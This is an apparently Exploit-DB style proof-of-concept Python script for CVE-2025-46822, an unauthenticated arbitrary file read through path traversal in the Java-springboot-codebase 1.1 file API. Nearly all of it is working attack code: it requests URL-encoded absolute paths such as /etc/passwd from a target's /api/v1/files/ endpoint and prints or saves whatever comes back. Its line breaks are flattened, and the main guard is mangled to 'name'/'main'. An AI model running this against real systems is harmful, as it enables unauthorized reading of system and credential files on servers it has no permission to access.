# Exploit Title: Java-springboot-codebase 1.1 - Arbitrary File Read # Google Dork: # Date: 23/May/2025 # Exploit Author: d3sca # Vendor Homepage: https://github.com/OsamaTaher/Java-springboot-codebase # Software Link: https://github.com/OsamaTaher/Java-springboot-codebase # Version: [app version] 1.1 # Tested on: Debian Linux # CVE : CVE-2025-46822 #usage: python3 cve-2025-46822.py http://victim.com /etc/passwd import argparse import requests from urllib.parse import quote def exploit(target, file_path, output=None): # Ensure the file path is absolute if not file_path.startswith('/'): print("[!] Warning: File path is not absolute. Prepending '/' to make it absolute.") file_path = '/' + file_path.lstrip('/') # URL-encode the file path encoded_path = quote(file_path, safe='') # Construct the target URL endpoint = f"/api/v1/files/{encoded_path}" url = target.rstrip('/') + endpoint print(f"[*] Attempting to retrieve: {file_path}") print(f"[*] Sending request to: {url}") try: response = requests.get(url, allow_redirects=False, timeout=10) if response.status_code == 200: print("[+] File retrieved successfully!") if output: with open(output, 'wb') as f: f.write(response.content) print(f"[+] Content saved to: {output}") else: print("\nFile contents:") print(response.text) else: print(f"[-] Failed to retrieve file. Status code: {response.status_code}") print(f"[-] Response: {response.text[:200]}") # Show first 200 chars of response except Exception as e: print(f"[-] An error occurred: {str(e)}") if name == "main": parser = argparse.ArgumentParser(description="Exploit Path Traversal Vulnerability in Unauthenticated File API") parser.add_argument("target", help="Target base URL (e.g., http://victim:8080)") parser.add_argument("file_path", help="Absolute path to target file (e.g., /etc/passwd)") parser.add_argument("-o", "--output", help="Output file to save contents") args = parser.parse_args() exploit(args.target, args.file_path, args.output)